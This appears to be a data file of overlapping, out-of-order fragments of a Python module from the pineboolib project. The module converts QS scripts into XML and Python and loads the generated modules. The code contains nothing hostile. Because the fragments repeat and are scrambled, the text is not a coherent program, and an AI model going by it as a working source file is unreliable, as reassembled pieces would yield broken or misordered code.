"except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {}",
"if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def",
"None self.subelems = [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self,",
"['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod def tagname(self, tagname): return self.__name__",
"if len(self.values) == 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0]",
"sys import imp import traceback from lxml import etree try: from pineboolib.flparser import",
"classobj is None: return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname)",
"= ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject):",
"self.subelems[0] else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class",
"self.xmlname is None: self.astname = \"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"]",
"1 - Parse and write XML file . . .\") try: execute(options, args)",
"[x for x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x)",
"tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self):",
"str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem):",
"CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"]",
"1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent",
"= [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject):",
"in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self, listobj):",
"%-35s \\n\" % (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\")",
"filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . . . (%.1f%%)",
"class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname is None: self.astname =",
"old_stderr = sys.stdout stream = io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname",
"[\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags = [\"storeinstruction\"] class",
"fp, pathname, description) result = True except FileNotFoundError: print(\"Fichero %r no encontrado\" %",
"self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname is None: self.astname",
"def add_other(self, argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject):",
"= False debug_other = False class NamedObject(TagObject): name_is_first_id = True debug_other = False",
"= create_xml(tagname) i = 0 for k, v in treedata['content']: if type(v) is",
"parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i,",
"tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values = []",
"KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown",
"= \"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class",
"imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp =",
"destname + \".debug\") except Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout",
"sys.stdout stream = io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname + \".debug\")",
"execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\",",
"ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def",
"= path def loadModule(self): fp = None try: description = ('.py', 'U', imp.PY_SOURCE)",
"vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\")",
"== \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return \"Class\" if tagname ==",
"%-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data) if ast is None: print(\"No",
"parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages",
"isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug:",
"encontrado\" % self.name) result = False except Exception as e: print(traceback.format_exc()) result =",
". . (%.1f%%) \" % (bname, 100.0 * (nf + 1.0) / nfs))",
"self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child",
"# print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name, path): self.name =",
"= [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\",",
"calcular mas continue tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception:",
"return \"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name, bases,",
"[\"optvartype\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class",
"[] set_child_argn = False name_is_first_id = False debug_other = True adopt_childs_tags = []",
"else: if options.cache: args = [x for x in args if not os.path.exists(x",
"not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue mod = Module(name, path)",
"Module(object): def __init__(self, name, path): self.name = name self.path = path def loadModule(self):",
"except Exception: print(\"Error al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not",
"arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython",
"name_is_first_id = True set_child_argn = False debug_other = False class TypedObject(ListObject): type_arg =",
"= \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"]",
"tags = [\"updateoperator\"] # ----- keep this one at the end. class Unknown(TagObject):",
"guardar resultado, no hace falta calcular mas continue tree_data = None try: tree_data",
"vtype, value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn ==",
"elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i +=",
"[\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject):",
"if options.cache: args = [x for x in args if not os.path.exists(x +",
"== \"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype ==",
"Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement',",
"dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results",
"vtype == \"ICONST\": vtype = \"Number\" if vtype == \"FCONST\": vtype = \"Number\"",
"== self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"]",
"pudo analizar %-35s \\n\" % (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname",
"class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject):",
"k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i += 1",
"return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags):",
"print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3 - Test PY",
"(%.1f%%) \\r\" % (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose:",
"continue tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al",
"@classmethod def can_process_tag(self, tagname): return tagname in self.tags def __init__(self, tagname): self.astname =",
"if vtype == \"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if",
"return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn,",
"= [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if",
"vtype = \"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value)",
"bname + \".xml\") else: destname = filename + \".xml\" f1 = open(destname, \"wb\")",
"'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] #",
"False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags",
"global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = []",
"as e: print(\"Error: No se pudo abrir fichero %-35s \\n\" % (repr(filename)), e)",
"open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se",
"[\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject):",
"post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def",
"print(traceback.format_exc()) result = False if fp: fp.close() return result def parseArgs(argv): parser =",
"callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other =",
"debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags =",
"\".xml\") else: destname = filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True))",
"1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname):",
"vtype == \"FCONST\": vtype = \"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\",",
"at the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod def",
"add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem)",
"return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS:",
"filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error:",
"options.exec_python options.exec_python = False options.full = False options.toxml = True if options.verbose: print(\"Pass",
"not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname]",
"cargando modulo %s\" % name) elif options.topython: from .pytnyzer import pythonize import io",
"options.toxml = True if options.verbose: print(\"Pass 1 - Parse and write XML file",
"FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType]",
"in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i += 1 return",
"def add_other(self, argn, vtype, value): if argn == 0: self.xml.set(\"mode\", vtype) def polish(self):",
"sys.stdout = stream try: pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error al",
"xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish() def",
"Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype, value): value = str(value) #",
"adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value): if argn == 0: self.xml.set(\"mode\",",
"= False options.topython = True if options.verbose: print(\"Pass 2 - Pythonize and write",
"default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file",
"str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject):",
"decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname]",
"1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return",
"callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self,",
"file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\",",
"listobj def get(self, listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__] if self.astname",
"class Instruction(TagObject): promote_child_if_alone = True debug_other = False tags = [\"instruction\"] class OpMath(TypedObject):",
"False except Exception as e: print(traceback.format_exc()) result = False if fp: fp.close() return",
"= flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a XML %r:\" % bname)",
"self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject):",
"tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname): return True # ----------------- def",
"filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no",
"is None: self.astname = \"empty\" return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags",
"and len(self.subelems) == 1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn = False",
"Exception as e: print(traceback.format_exc()) result = False if fp: fp.close() return result def",
"pythonify(filelist): options, args = parseArgs([]) options.full = True if isinstance(filelist, str): filelist =",
"try: execute(options, [arg + \".xml\" for arg in args]) except Exception: print(\"Error convirtiendo:\")",
"= subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml)",
"\"optid\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class",
"False class TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype, value): if argn",
"bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else: destname",
"child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self, listobj): return self.__class__ in",
"dest file exists, don't regenerate it\") (options, args) = parser.parse_args(argv) return (options, args)",
"parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\",",
"None: self.astname = \"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem =",
"[\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list',",
"__init__(self, name, path): self.name = name self.path = path def loadModule(self): fp =",
"= [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem",
"ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags =",
"\"Regex\" if vtype == \"ICONST\": vtype = \"Number\" if vtype == \"FCONST\": vtype",
"def polish(self): # if len(self.values) == 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\"))",
"False set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"]",
"dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless",
"useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\",",
"+ \".debug\") except Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout =",
"mod = Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo %s\" % name)",
"\".qs.py\"))] nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if",
"result = False except Exception as e: print(traceback.format_exc()) result = False if fp:",
"\"Function\" if tagname == \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return \"Variable\"",
"add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn = False",
"[\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject):",
"subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn = False tags =",
"%r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if len(text) >",
"pudo abrir fichero %-35s \\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\")",
"self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) == 0",
"= ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"]",
"os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s . . . . (%.1f%%) \"",
"\"Source\" if tagname == \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return \"Class\"",
"argn == 0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject):",
"help=\"If dest file exists, don't regenerate it\") (options, args) = parser.parse_args(argv) return (options,",
"tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class",
". .\") try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False",
"= [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self):",
"is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i,",
"vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype =",
"[(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception: print(\"Error al ejecutar",
"= [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False",
"= True set_child_argn = False debug_other = False class TypedObject(ListObject): type_arg = 0",
"= False options.toxml = True if options.verbose: print(\"Pass 1 - Parse and write",
"callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class",
"[] class TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name,",
"self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn:",
"True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone = False",
"self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) == 1: return self.subelems[0] return self",
"%r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear %-35s \\n\"",
"filename in args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath):",
"TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct)",
"value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\",",
"class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype, value): value = str(value)",
"tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"]",
"open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name,",
"if self.__class__ in listobj: return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return",
"if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else: destname = filename +",
"= ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class",
"if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject):",
"parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False,",
"continue if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else: destname = filename",
"class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags",
"False debug_other = False class TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype,",
"execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug: print(options, args) if options.full: execpython",
"None try: description = ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED)",
"[] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for",
"print(\"Pass 3 - Test PY file load . . .\") options.topython = False",
"prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo abrir %-35s",
"tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in self.tags def __init__(self,",
"if self.xmlname is None: self.astname = \"empty\" return self class Arguments(ListObject): tags =",
"% filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if len(text) > 2:",
"% self.name) result = False except Exception as e: print(traceback.format_exc()) result = False",
"no se quiere guardar resultado, no hace falta calcular mas continue tree_data =",
"('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")]",
"def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn =",
". . (%.1f%%) \\r\" % (bname, 100.0 * (nf + 1.0) / nfs))",
"\"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn =",
"%d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml: #",
"destname = filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close() if",
"Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def",
"to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False,",
"pathname, description) result = True except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name)",
"[\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\",",
"nf, filename in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname",
"True set_child_argn = False @classmethod def tagname(self, tagname): return tagname @classmethod def can_process_tag(self,",
"else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return",
"= False debug_other = False class TypedObject(ListObject): type_arg = 0 def add_other(self, argn,",
"not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs",
"\"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\": vtype = \"Number\" if vtype",
"and write XML file . . .\") try: execute(options, args) except Exception: print(\"Error",
"print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for filename",
"errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si",
"tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject):",
"qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate it\") (options,",
"tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"]",
"[\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags",
"sys.stdout.write( \"Pythonizing File: %-35s . . . . (%.1f%%) \\r\" % (bname, 100.0",
"se pudo abrir fichero %-35s \\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent)",
"[x for x in args if not os.path.exists(x + \".xml\") or os.path.getmtime(x) >",
"%r no encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s .",
"= fn return fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if",
"Test PY file load . . .\") options.topython = False try: execute( options,",
"options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args = parseArgs([]) options.full",
"print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name, path): self.name = name",
"= \"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist',",
"(bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr =",
"subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"]",
"None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0 for",
"tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) == 0",
"prog: print(\"Error: No se pudo abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"]",
"TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype, value): if argn == self.type_arg:",
"= [\"optvartype\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self",
"argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags =",
"bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s . . . .",
"[\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self):",
"prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue",
"adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class",
"== 1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn = False debug_other =",
"\"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\",",
"True except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result = False except",
"= etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values = [] if self.name_is_first_id:",
"self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname",
"+ \".xml\" for arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython:",
"if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value))",
"args = [x for x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))",
"= destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue",
"[\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject):",
"except Exception as e: print(traceback.format_exc()) result = False if fp: fp.close() return result",
"<reponame>Miguel-J/pineboo-buscar<filename>pineboolib/flparser/postparse.py<gh_stars>0 #!/usr/bin/python from builtins import str from builtins import object from optparse import",
